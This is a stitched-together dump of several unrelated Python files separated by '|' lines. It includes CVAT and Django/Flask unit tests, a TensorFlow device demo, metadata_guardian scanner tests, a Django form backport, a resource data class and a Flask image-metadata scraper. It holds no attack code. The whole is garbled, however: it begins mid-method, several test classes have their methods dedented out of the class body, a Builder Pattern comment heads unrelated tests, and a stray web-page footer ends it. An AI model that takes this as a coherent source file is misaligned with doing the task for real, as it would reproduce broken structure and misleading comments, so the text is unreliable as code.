                url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
                with open(file_zip_name, 'rb') as binary_file:
                    self._upload_file(url, binary_file, self.admin)
                # equals annotations
                # BUG FIX: removed a stray trailing "\" line continuation after
                # the compare_datasets() call below; it glued this statement to
                # the following method's "def" line and broke the file's syntax.
                data_from_task_after_upload = self._get_data_from_task(task_id, include_images)
                compare_datasets(self, data_from_task_before_upload, data_from_task_after_upload)
def test_api_v1_check_attribute_import_in_tracks(self):
    """Verify that track attributes survive a dump/upload round trip on a
    multi-job task, with and without images included.
    """
    test_name = self._testMethodName
    dump_format_name = "CVAT for video 1.1"
    upload_format_name = "CVAT 1.1"
    for include_images in (False, True):
        with self.subTest():
            # Build a multi-job task whose tracks carry attributes.
            task = self._create_task(tasks["many jobs"], self._generate_task_images(13))
            self._create_annotations(task, f'{dump_format_name} attributes in tracks', "default")
            task_id = task["id"]
            snapshot_before = self._get_data_from_task(task_id, include_images)
            dump_url = self._generate_url_dump_tasks_annotations(task_id)
            request_data = {
                "format": dump_format_name,
                "action": "download",
            }
            with TestDir() as test_dir:
                archive_path = osp.join(test_dir, f'{test_name}_{dump_format_name}.zip')
                self._download_file(dump_url, request_data, self.admin, archive_path)
                self._check_downloaded_file(archive_path)
                # Wipe, re-import, and compare against the snapshot.
                self._remove_annotations(dump_url, self.admin)
                upload_url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
                with open(archive_path, 'rb') as archive:
                    self._upload_file(upload_url, archive, self.admin)
                snapshot_after = self._get_data_from_task(task_id, include_images)
                compare_datasets(self, snapshot_before, snapshot_after)
|
#!/usr/bin/env python
import unittest, os
from datetime import datetime
#import app
import models
#from . import app,db
#from .models import FeatureRequest
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
class BasicTests(unittest.TestCase):
    """Smoke tests for the feature-request Flask application.

    NOTE(review): ``app``, ``db`` and ``FeatureModel`` are not imported in
    this module — the relevant imports above are commented out. Presumably
    they come from ``from . import app, db`` and the ``models`` module;
    confirm and restore the imports, otherwise these tests raise NameError.
    """

    def setUp(self):
        # Point SQLAlchemy at a local sqlite file and start each test from
        # a freshly recreated schema.
        app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(BASE_DIR, 'app.db')
        self.app = app.test_client()
        db.drop_all()
        db.create_all()

    def tearDown(self):
        # Drop everything so tests cannot leak state into each other.
        db.session.remove()
        db.drop_all()

    def test_home_page(self):
        # The index page must be reachable (redirects followed).
        response = self.app.get('/',follow_redirects=True)
        self.assertEqual(response.status_code,200)

    def test_feature_create(self):
        # Inserting a feature must make it visible to a fresh query.
        new_feature = FeatureModel(title='title',client='A',description='desc',priority=1,product_area='policy',target_date=datetime.strptime('2019-03-26', '%Y-%m-%d'))
        print(new_feature)
        db.session.add(new_feature)
        db.session.commit()
        features = FeatureModel.query.all()
        assert new_feature in features
        print("NUMBER OF ENTRİES:")
        print (len(features))

    def test_feature_delete(self):
        # Deleting a freshly inserted feature must remove it from queries.
        new_feature = FeatureModel(title='title',client='A',description='desc',priority=1,product_area='policy',target_date=datetime.strptime('2019-03-26', '%Y-%m-%d'))
        db.session.add(new_feature)
        db.session.commit()
        feature_to_delete = FeatureModel.query.get(new_feature.id)
        db.session.delete(feature_to_delete)
        db.session.commit()
        features = FeatureModel.query.all()
        assert new_feature not in features
        print("NUMBER OF ENTRİES:")
        print (len(features))
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
|
from datetime import timedelta
from django.contrib.contenttypes.models import ContentType
from django.utils import timezone
from api.audit_trail.enums import AuditType
from api.audit_trail.models import Audit
from api.audit_trail.tests.factories import AuditFactory
from api.cases.models import Case
from api.teams.tests.factories import TeamFactory
from test_helpers.clients import DataTestClient
from api.users.enums import UserType
from api.users.models import GovUser
from api.users.tests.factories import GovUserFactory, ExporterUserFactory
from api.audit_trail.service import filter_object_activity
class CasesAuditTrailSearchTestCase(DataTestClient):
def setUp(self):
    """Create a standard case plus one internal (gov) and one exporter user."""
    super().setUp()
    self.content_type = ContentType.objects.get_for_model(Case)
    self.case = self.create_standard_application_case(self.organisation)
    self.exporter_user = ExporterUserFactory()
    team = TeamFactory()
    self.team = team
    self.gov_user = GovUserFactory(team=team)
def test_filter_by_gov_user(self):
    """filter_object_activity narrows results to the given gov user id."""
    AuditFactory(actor=self.gov_user, target=self.case.get_case())
    activity = filter_object_activity(
        object_id=self.case.id,
        object_content_type=self.content_type,
        user_id=self.gov_user.pk,
    )
    self.assertEqual(1, activity.count())
    self.assertEqual(str(self.gov_user.pk), activity.first().actor_object_id)
def test_filter_by_exporter_user(self):
    """filter_object_activity narrows results to the given exporter user id."""
    AuditFactory(actor=self.exporter_user, target=self.case.get_case())
    activity = filter_object_activity(
        object_id=self.case.id,
        object_content_type=self.content_type,
        user_id=self.exporter_user.pk,
    )
    self.assertEqual(1, activity.count())
    self.assertEqual(str(self.exporter_user.pk), activity.first().actor_object_id)
def test_filter_by_team(self):
    """Filtering by team returns only audits whose actor belongs to it."""
    AuditFactory(actor=self.gov_user, target=self.case.get_case())
    activity = filter_object_activity(object_id=self.case.id, object_content_type=self.content_type, team=self.team)
    self.assertEqual(1, activity.count())
    self.assertEqual(str(self.gov_user.pk), activity.first().actor_object_id)
    # An audit from a user on a different team must not show up.
    other_team = TeamFactory()
    other_user = GovUserFactory(team=other_team)
    AuditFactory(actor=other_user, target=self.case.get_case())
    self.assertNotEqual(other_team.id, self.team.id)
    self.assertNotEqual(other_user.pk, self.gov_user.pk)
    activity = filter_object_activity(object_id=self.case.id, object_content_type=self.content_type, team=self.team)
    self.assertEqual(1, activity.count())
    self.assertEqual(str(self.gov_user.pk), activity.first().actor_object_id)
def test_filter_by_audit_type(self):
    """Filtering by audit type excludes audits with a different verb.

    NOTE(review): the expected count of 2 implies a second UPDATED_STATUS
    audit already exists before this test creates one — presumably emitted
    by setUp's case creation; confirm, since only one matching audit is
    created here and the GOOD_REVIEWED audit must be filtered out.
    """
    audit_type = AuditType.UPDATED_STATUS
    fake_audit_type = AuditType.GOOD_REVIEWED
    AuditFactory(actor=self.exporter_user, verb=audit_type, target=self.case.get_case())
    AuditFactory(actor=self.gov_user, verb=fake_audit_type, target=self.case.get_case())
    res = filter_object_activity(
        object_id=self.case.id, object_content_type=self.content_type, audit_type=audit_type
    )
    self.assertEqual(res.count(), 2)
    # Most recent matching audit first: the exporter's UPDATED_STATUS one.
    self.assertEqual(res.first().actor_object_id, str(self.exporter_user.pk))
    self.assertEqual(res.first().verb, audit_type)
def test_filter_by_user_type(self):
    """The user_type filter separates internal (gov) from exporter activity."""
    AuditFactory(actor=self.gov_user, target=self.case.get_case())
    AuditFactory(actor=self.exporter_user, target=self.case.get_case())

    # Check the internal filter first, then the exporter filter.
    for user_type, expected_actor in (
        (UserType.INTERNAL, self.gov_user),
        (UserType.EXPORTER, self.exporter_user),
    ):
        activity = filter_object_activity(
            object_id=self.case.id, object_content_type=self.content_type, user_type=user_type
        )
        self.assertEqual(activity.count(), 1)
        self.assertEqual(activity.first().actor_object_id, str(expected_actor.pk))
def test_filter_by_dates(self):
    """date_from/date_to bound the activity stream inclusively on both ends."""
    start_date = timezone.now()
    middle_date = start_date + timedelta(days=3)
    end_date = start_date + timedelta(days=5)
    AuditFactory(created_at=start_date, actor=self.gov_user, target=self.case.get_case())
    AuditFactory(created_at=middle_date, actor=self.gov_user, target=self.case.get_case())
    AuditFactory(created_at=end_date, actor=self.gov_user, target=self.case.get_case())

    def query(**date_bounds):
        # Every query targets the same object; only the date bounds vary.
        return filter_object_activity(
            object_id=self.case.id, object_content_type=self.content_type, **date_bounds
        )

    # NOTE(review): the expected counts run one higher than the audits created
    # above, which implies setUp() seeds an audit at "now" — confirm against
    # the fixture.
    self.assertEqual(query(date_from=start_date.date()).count(), 4)
    self.assertEqual(query(date_from=middle_date.date()).count(), 2)
    self.assertEqual(query(date_from=end_date.date()).count(), 1)

    self.assertEqual(query(date_from=start_date.date(), date_to=middle_date.date()).count(), 3)
    self.assertEqual(query(date_from=middle_date.date(), date_to=end_date.date()).count(), 2)
    self.assertEqual(query(date_from=end_date.date(), date_to=end_date.date()).count(), 1)

    # Windows entirely outside the audit range must be empty.
    self.assertEqual(query(date_from=(end_date + timedelta(days=1)).date()).count(), 0)
    self.assertEqual(query(date_to=(start_date - timedelta(days=1)).date()).count(), 0)
|
#!/usr/bin/env python
# coding=utf-8
# Demo: pin an op to a custom "MY_DEVICE" device with soft placement disabled,
# so TensorFlow must either honour the placement (if a pluggable device with
# that type is registered) or fail loudly with a placement error.
import tensorflow as tf
import numpy as np

# Graph mode is required for the Session-based execution below.
tf.compat.v1.disable_eager_execution()

a = tf.random.normal(shape=[10], dtype=tf.float32)
# "MY_DEVICE" is presumably registered by a device plugin — TODO confirm;
# on a stock TensorFlow build this placement cannot be satisfied.
with tf.device("/MY_DEVICE:0"):
    b = tf.nn.relu(a)

# allow_soft_placement=False forbids falling back to CPU/GPU;
# log_device_placement prints the op-to-device mapping for inspection.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(allow_soft_placement=False, log_device_placement=True))
print(sess.run(b))
|
# Builder Pattern is a unique design pattern which helps in building complex object using simple objects and uses an algorithmic approach.
# In this design pattern, a builder class builds the final object in step-by-step procedure.
# Constructing Complex objects : The Builder Method allows you to construct the products step-by-step.
# We can even defer the execution of some steps without breaking the final product.
# To create an object tree, it is handy to call the steps recursively.
# It prevents the client code from fetching the incomplete data because it doesn’t allow the exposing of an unfinished object.
# Differ by Representations: The Builder pattern is applicable when construction of various representations of the product involves similar steps that differ only in the details.
# The base builder interface is used to define all the construction steps while these steps are implemented by concrete builders.
import pytest
from metadata_guardian.data_rules import AvailableCategory, DataRules
from metadata_guardian.scanner import ColumnScanner, ContentFilesScanner
from metadata_guardian.source import AvroSchemaSource
@pytest.mark.parametrize("local_file", ["example_rules.yaml"], indirect=["local_file"])
def test_get_data_rules_from_path_should_work(local_file):
    """Loading data rules from a YAML file path should populate the rule set."""
    rules = DataRules.from_path(path=local_file)
    assert rules._data_rules is not None
@pytest.mark.parametrize(
    "local_file", ["users_avro_schema.json"], indirect=["local_file"]
)
def test_get_data_rules_from_category_pii_with_violation(local_file):
    """Scanning the Avro schema with PII rules should flag the 'name' column."""
    pii_rules = DataRules.from_available_category(category=AvailableCategory.PII)
    avro_source = AvroSchemaSource(local_path=local_file)

    report = ColumnScanner(data_rules=pii_rules).scan_local(source=avro_source)

    first_report = report.report_results[0]
    assert "tests/resources/users_avro_schema.json" in first_report.source
    assert len(first_report.results) == 1

    violation = first_report.results[0]
    assert violation.content == "name"
    assert violation.category == "PII"
    assert len(violation.data_rules) == 1

    matched_rule = violation.data_rules[0]
    assert matched_rule.rule_name == "person"
    assert (
        matched_rule.documentation
        == "The person is a personal identifiable information.\n"
    )
@pytest.mark.parametrize(
    "local_file", ["users_avro_schema.json"], indirect=["local_file"]
)
def test_get_data_rules_from_category_inclusion_no_violation(local_file):
    """Inclusion rules should find nothing to report in the Avro schema."""
    inclusion_rules = DataRules.from_available_category(category=AvailableCategory.INCLUSION)

    report = ColumnScanner(data_rules=inclusion_rules).scan_local(
        source=AvroSchemaSource(local_path=local_file)
    )

    first_report = report.report_results[0]
    assert "resources/users_avro_schema.json" in first_report.source
    assert len(first_report.results) == 0
@pytest.mark.parametrize(
    "local_file", ["inclusion_violation.txt"], indirect=["local_file"]
)
def test_get_data_rules_from_category_inclusion_violation_content(local_file):
    """Scanning a text file with inclusion rules should flag the 'master' term."""
    inclusion_rules = DataRules.from_available_category(category=AvailableCategory.INCLUSION)

    report = ContentFilesScanner(data_rules=inclusion_rules).scan_local_file(local_file)

    first_report = report.report_results[0]
    assert "resources/inclusion_violation.txt" in first_report.source
    assert len(first_report.results) == 1

    violation = first_report.results[0]
    assert (
        violation.content
        == "feudal age in that they were not bound to the soil but to the master."
    )
    assert violation.category == "INCLUSION"
    assert len(violation.data_rules) == 1

    matched_rule = violation.data_rules[0]
    assert matched_rule.rule_name == "master"
    assert (
        matched_rule.documentation
        == '"Master–slave" is an offensive and exclusionary metaphor that cannot be detached from American\n'
        "history. Prefer describing a hierarchical relationship between nodes more precisely. Prefer using\n"
        "leader/follower, primary/replica or primary/standby.\n"
    )
|
"""
tl;dr: See FutureModelForm's docstring.
Many apps provide new related managers to extend your django models with. For
example, django-tagulous provides a TagField which abstracts an M2M relation
with the Tag model, django-gm2m provides a GM2MField which abstracts a
relation, django-taggit provides a TaggableManager which abstracts a relation
too, django-generic-m2m provides RelatedObjectsDescriptor which abstracts a
relation again.
While that works pretty well, it gets a bit complicated when it comes to
encapsulating the business logic for saving such data in a form object. This is
three-part problem:
- getting initial data,
- saving instance attributes,
- saving relations like reverse relations or many to many.
Django's ModelForm calls the model field's ``value_from_object()`` method to get
the initial data. ``FutureModelForm`` tries the ``value_from_object()`` method
from the form field instead, if defined. Unlike the model field, the form field
doesn't know its name, so ``FutureModelForm`` passes it when calling the form
field's ``value_from_object()`` method.
Django's ModelForm calls the form field's ``save_form_data()`` in two
occasions:
- in ``_post_clean()`` for model fields in ``Meta.fields``,
- in ``_save_m2m()`` for model fields in ``Meta.virtual_fields`` and
``Meta.many_to_many``, which then operate on an instance which has a PK.
If we just added ``save_form_data()`` to form fields like for
``value_from_object()`` then it would be called twice, once in
``_post_clean()`` and once in ``_save_m2m()``. Instead, ``FutureModelForm``
would call the following methods from the form field, if defined:
- ``save_object_data()`` in ``_post_clean()``, to set object attributes for a
given value,
- ``save_relation_data()`` in ``_save_m2m()``, to save relations for a given
value.
For example:
- a generic foreign key only sets instance attributes, its form field would do
that in ``save_object_data()``,
- a tag field saves relations, its form field would do that in
``save_relation_data()``.
"""
from itertools import chain
from django import forms
class FutureModelForm(forms.ModelForm):
    """
    ModelForm which adds extra API to form fields.

    Form fields may define new methods for FutureModelForm:

    - ``FormField.value_from_object(instance, name)`` should return the initial
      value to use in the form, overrides ``ModelField.value_from_object()``
      which is what ModelForm uses by default,

    - ``FormField.save_object_data(instance, name, value)`` should set instance
      attributes. Called by ``save()`` **before** writing to the database, when
      ``instance.pk`` may not be set, it overrides
      ``ModelField.save_form_data()`` which is normally used in this occasion
      for non-m2m and non-virtual model fields.

    - ``FormField.save_relation_data(instance, name, value)`` should save
      relations required for value on the instance. Called by ``save()``
      **after** writing to the database, when ``instance.pk`` is necessarily
      set, it overrides ``ModelField.save_form_data()`` which is normally used
      in this occasion for m2m and virtual model fields.

    For complete rationale, see this module's docstring.
    """

    def __init__(self, *args, **kwargs):
        """Override that uses a form field's ``value_from_object()``."""
        super(FutureModelForm, self).__init__(*args, **kwargs)

        for name, field in self.fields.items():
            if not hasattr(field, 'value_from_object'):
                continue

            # Let the *form* field compute the initial value; unlike the model
            # field it does not know its own name, so pass the name along.
            self.initial[name] = field.value_from_object(self.instance, name)

    def _post_clean(self):
        """Override that uses the form field's ``save_object_data()``."""
        super(FutureModelForm, self)._post_clean()

        for name, field in self.fields.items():
            if not hasattr(field, 'save_object_data'):
                continue

            # Pre-save hook: only set instance attributes here — the instance
            # may not have a PK yet, so no relations may be written.
            field.save_object_data(
                self.instance,
                name,
                self.cleaned_data.get(name, None),
            )

    def _save_m2m(self): # noqa
        """Override that uses the form field's ``save_relation_data()``."""
        cleaned_data = self.cleaned_data
        exclude = self._meta.exclude
        fields = self._meta.fields
        opts = self.instance._meta

        # Added to give the field a chance to do the work
        handled = []
        for name, field in self.fields.items():
            if not hasattr(field, 'save_relation_data'):
                continue

            # NOTE(review): direct indexing raises KeyError if the field is
            # missing from cleaned_data (unlike the .get() used in
            # _post_clean) — confirm every save_relation_data field is always
            # present after validation.
            field.save_relation_data(
                self.instance,
                name,
                cleaned_data[name]
            )
            handled.append(name)

        # Note that for historical reasons we want to include also
        # virtual_fields here. (GenericRelation was previously a fake
        # m2m field).
        for f in chain(opts.many_to_many, opts.virtual_fields):
            # Added to give the form field a chance to do the work
            if f.name in handled:
                continue
            if not hasattr(f, 'save_form_data'):
                continue
            if fields and f.name not in fields:
                continue
            if exclude and f.name in exclude:
                continue
            if f.name in cleaned_data:
                f.save_form_data(self.instance, cleaned_data[f.name])

    def save(self, commit=True):
        """Backport from Django 1.9+ for 1.8."""
        if self.errors:
            raise ValueError(
                "The %s could not be %s because the data didn't validate." % (
                    self.instance._meta.object_name,
                    'created' if self.instance._state.adding else 'changed',
                )
            )

        if commit:
            # If committing, save the instance and the m2m data immediately.
            self.instance.save()
            self._save_m2m()
        else:
            # If not committing, add a method to the form to allow deferred
            # saving of m2m data.
            self.save_m2m = self._save_m2m

        return self.instance
|
"""
Resource data of various kinds, including emoji/stickers, images and audio
attached to chat messages. Because the same resource may be shared by several
users, the user id is deliberately not used as the linking field.

Created by judy 2018/10/18
"""
from commonbaby.helpers import helper_crypto, helper_str
from datacontract.idowndataset import Task
from datacontract.outputdata import EStandardDataType
from .feedbackbase import EResourceType, FeedDataBase, Resource
class RESOURCES(FeedDataBase, Resource):
    """
    A chat-attachment resource record (image/video/audio/share-link/other).

    tsk: datacontract.Task\n
    url: the resource URL, used as the unique identifier of this resource,
        not for downloading it.
    resourcetype: 0 image, 1 video, 2 audio, 3 website (shared link), 4 other
    """

    def __init__(self, clientid: str, tsk: Task, url: str,
                 resourcetype: EResourceType, apptype: int):
        FeedDataBase.__init__(self, '.idown_resource',
                              EStandardDataType.Resource, tsk, apptype,
                              clientid, False)
        Resource.__init__(self, url, resourcetype)
        # Optional metadata, expected to be filled in by callers after
        # construction (both remain None/empty when unknown).
        self.resourceid: str = None
        self.extension: str = None

    def _get_output_fields(self) -> dict:
        """Return the field dict for the current output data segment."""
        self.append_to_fields('url', self._url)
        self.append_to_fields('resourceid', self.resourceid)
        self.append_to_fields('filename', self.filename)
        # sign is serialized through its mapped representation, not directly.
        self.append_to_fields('sign', self._sign_map[self.sign])
        self.append_to_fields('extension', self.extension)
        self.append_to_fields('resourcetype', self._resourcetype.value)
        return self._fields

    # def _get_write_lines(self):
    #     lines = ''
    #     lines += 'url:{}\r\n'.format(helper_str.base64format(self._url))
    #     if self.resourceid is not None and self.resourceid != '':
    #         lines += 'resourceid:{}\r\n'.format(
    #             helper_str.base64format(self.resourceid))
    #     if self.filename is not None and self.filename != '':
    #         lines += 'filename:{}\r\n'.format(
    #             helper_str.base64format(self.filename))
    #     if self.sign is not None and self.sign != ESign.Null:
    #         lines += 'sign:{}\r\n'.format(
    #             helper_str.base64format(self._sign_map[self.sign]))
    #     if self.extension is not None and self.extension != '':
    #         lines += 'extension:{}\r\n'.format(
    #             helper_str.base64format(self.extension))
    #     lines += 'resourcetype:{}\r\n'.format(self._resourcetype)
    #     lines += '\r\n'
    #     return lines

    def get_uniqueid(self):
        """MD5 over resourceid + apptype + url identifies this resource."""
        return helper_crypto.get_md5_from_str("{}{}{}".format(self.resourceid, self._task.apptype, self._url))

    def get_display_name(self):
        """Build a short human-readable label from filename and sign."""
        res = ''
        if not helper_str.is_none_or_empty(self.filename):
            res += " {}".format(self.filename)
        # NOTE(review): _get_output_fields maps self.sign through
        # self._sign_map, which suggests sign may not be a plain string —
        # confirm is_none_or_empty handles that type.
        if not helper_str.is_none_or_empty(self.sign):
            res += " {}".format(self.sign)
        return res
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
import logging.handlers
import re
import sys
import os
from werkzeug.wrappers import Response
import urllib.request, urllib.error, urllib.parse
import requests
from bs4 import BeautifulSoup
import json
import cgi
from cgi import escape
import mwclient
import sqlite3
import io, gzip
import yaml
from flask import request, url_for, make_response
from .controller import Controller
import logging
logger = logging.getLogger()
class UrlController(Controller):
    """Flask controller that scrapes image metadata from oslobilder.no /
    digitaltmuseum.no pages: license, Commons-formatted fields, categories
    and the source image URL.

    Fixes over the previous revision:
    - the sqlite connection/cursor opened in ``check_url`` is now always
      closed (the old ``cur.close()``/``db.close()`` calls sat *after* the
      return statements and were unreachable, leaking the connection),
    - deprecated ``logging.Logger.warn`` replaced by ``warning``,
    - ``== None`` comparisons replaced by ``is None`` / ``is not None``,
    - the CGI-era ``sys.stderr = sys.stdout`` debug residue in ``get()``
      was removed, and the local ``license`` variable no longer shadows
      the builtin.
    """

    def __init__(self, app, config):
        Controller.__init__(self, app)
        self.config = config

    def check_url(self, url, hostname):
        """Scrape *url* and return a dict describing the image.

        On success the dict has ``license``, ``src``, ``metadata``, ``cats``,
        ``year`` and ``hostname`` keys; on failure it carries an ``error`` key
        (and possibly partial ``metadata``).
        """
        logger = logging.getLogger()

        response = requests.get(url, headers={
            'User-Agent': 'Oslobilder@Commons (+https://toolserver.org/~danmichaelo/oslobilder)',
            'Referer': 'https://toolserver.org/~danmichaelo/oslobilder',
            'Accept-Encoding': 'gzip'
        })
        soup = BeautifulSoup(response.text, 'html.parser')
        commons = mwclient.Site('commons.wikimedia.org')

        # Find license info: newer pages use "copyright-info", older ones
        # plain "copyright".
        cp = soup.find_all('p', 'copyright-info')
        if len(cp) == 0:
            cp = soup.find_all('p', 'copyright')
        if len(cp) == 0:
            logger.warning('No license info (URL: %s)', url)
            return {'error': 'Fant ikke lisensinformasjon for bildet'}
        try:
            tag = cp[0].find('a').get('href')
        except AttributeError:
            logger.warning('No license info (URL: %s)', url)
            return {'error': 'Fant ikke lisensinformasjon for bildet'}

        # Map the license link to a short identifier.
        license_id = 'unknown'
        if tag.find('licenses/by-sa/') != -1:
            license_id = 'by-sa'
        elif tag.find('licenses/by-nc-nd/') != -1:
            license_id = 'by-nc-nd'
        elif tag.find('/publicdomain/') != -1:
            license_id = 'pd'
        else:
            logger.warning('Fant en ukjent lisens: "%s" (URL: %s)', tag, url)

        # Find other metadata:
        year = ''
        fields = {}
        cats = []
        # Date patterns, tried in order; the replacement turns the raw text
        # into Commons date-template markup.
        date_re = [
            [re.compile(r'([0-9]{4}) - ([0-9]{4}) \(ca(\.)?\)', re.I), r'{{Other date|~|\1|\2}}'],
            [re.compile(r'([0-9]{4}) \(ca(\.)?\)', re.I), r'{{Other date|~|\1}}'],
            [re.compile(r'([0-9]{4}) - ([0-9]{4})'), r'{{Other date|-|\1|\2}}'],
            [re.compile(r'([0-9]{4}) \(([0-9]{2})\.([0-9]{2})\.\)'), r'\1-\3-\2'],
            [re.compile(r'^([0-9]{4}) \(ANT\)$'), r'\1 (assumed)'],
            [re.compile(r'^([0-9]{4})$'), r'\1']
        ]
        # "Last, First" -> "First Last".
        # NOTE(review): [^,] matches a single character only — presumably
        # [^,]+ was intended; confirm against real page data before changing.
        r3 = re.compile(r'^([^,]), (.*)$')
        r4 = re.compile(r'ukjent( person)?', re.I)

        fieldnames_re = [re.compile(q) for q in self.config['fieldnames']]

        # Warn about <dt> labels no configured pattern matches, so new page
        # fields get noticed.
        for tag in soup.find_all('dt'):
            name = tag.text
            matched = None
            for f in fieldnames_re:
                if f.search(name):
                    matched = f.pattern
                    break
            if not matched:
                logger.warning('Found unknown field: "%s" (URL: %s)', name, url)

        for fn, fn_re in zip(self.config['fieldnames'], fieldnames_re):
            tag = soup.find('dt', text=fn_re)
            if not tag:
                fields[fn] = 'NOTFOUND'
            else:
                val = tag.findNext('dd')
                if val is None:
                    fields[fn] = 'NOTFOUND'
                    continue
                if val.find('div') is not None:
                    val = val.find('div')
                val = val.text.strip().rstrip('.')
                if fn == 'Datering':
                    matched = False
                    for pattern, replacement in date_re:
                        match = pattern.match(val)
                        if match:
                            matched = True
                            val = pattern.sub(replacement, val)
                            year = match.groups()[-1]
                    if not matched:
                        logger.warning('Found unknown date format: "%s" (URL: %s)', val, url)
                elif fn == 'Avbildet sted' or fn == 'Emneord':
                    val = '|'.join([q.text.strip() for q in tag.find_next('dd').find_all('a')])
                elif fn == 'Avbildet person':
                    val = r3.sub(r'\2 \1', val)
                    cats.append(val)
                    # Consecutive empty <dt>s hold additional person names.
                    # NOTE(review): appending the *accumulated* val each pass
                    # looks odd (cats gets growing strings) — confirm whether
                    # appending tmp was intended.
                    while tag.find_next('dt').text.strip() == '':
                        tag = tag.find_next('dt')
                        tmp = tag.findNext('dd').findChild('div').text.strip()
                        tmp = r3.sub(r'\2 \1', tmp)
                        val += '\n' + tmp
                        cats.append(val)
                elif fn == 'Fotograf' or fn == 'Kunstner':
                    vals = val.split(',')
                    if len(vals) == 2:
                        last = vals[0].strip()
                        first = vals[1].strip()
                        val = first + ' ' + last
                    if r4.search(val):
                        val = r4.sub(r'{{Unknown|author}}', val)
                    else:
                        # Use the Commons Creator: template when one exists,
                        # following redirects to the canonical name.
                        creator_template = 'Creator:%s' % val
                        p = commons.pages[creator_template]
                        if p.exists:
                            if p.redirect:
                                creator_template = p.redirects_to().name
                            val = '{{%s}}' % creator_template
                fields[fn] = val

        # Find image source URL
        src = soup.find('li', id='downloadpicture')
        if src is not None:
            src = 'http://' + hostname + '.no' + src.find('a').get('href')
        else:
            src = soup.find('div', 'image').findChild('img').get('src')
            src = src.split('?')[0]  # remove dimensions query string

        # Find institution and image identification
        if fields['Permalenke'] != 'NOTFOUND':
            institution, imageid = fields['Permalenke'].split('/', 4)[3:]
        elif fields['Eier'] != 'NOTFOUND' and fields['Inventarnr.'] != 'NOTFOUND':
            institution = fields['Eier']
            imageid = fields['Inventarnr.']
        else:
            return {'error': 'unknown_institution', 'metadata': fields}

        # Check if the image has already been transferred. The DB handles are
        # closed before returning (previously the close() calls were
        # unreachable dead code after the returns).
        db = self.open_db()
        try:
            db.row_factory = sqlite3.Row
            cur = db.cursor()
            try:
                rows = cur.execute('SELECT filename FROM files ' + \
                    'WHERE institution=? AND imageid=?', (institution, imageid)).fetchall()
            finally:
                cur.close()
        finally:
            db.close()

        if len(rows) > 0:
            return {'error': 'duplicate', 'institution': institution, 'imageid': imageid, 'filename': rows[0][0]}
        return {'license': license_id, 'src': src, 'metadata': fields, 'cats': cats, 'year': year, 'hostname': hostname}

    def get(self):
        """Flask GET handler: validate the ``url`` query argument and return
        the scraped metadata as JSON."""
        url = request.args.get('url')

        hostname = re.match(r'http(s)?://(www\.)?([a-z]*?)\.no', url)
        if hostname is None:
            # NOTE(review): CGI-style print + sys.exit kills the whole worker
            # process inside a Flask handler; a 400 Response would be the
            # proper fix but would change observable behavior, so it is only
            # flagged here.
            print("Content-Type: text/plain")
            print()
            print("Invalid url!")
            sys.exit(0)
        hostname = hostname.group(3)
        if hostname != 'oslobilder' and hostname != 'digitaltmuseum':
            print("Content-Type: text/plain")
            print()
            print("Invalid url!")
            sys.exit(0)

        data = json.dumps(self.check_url(url, hostname))
        resp = make_response(data)
        resp.headers['Content-Type'] = 'application/json'
        return resp
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.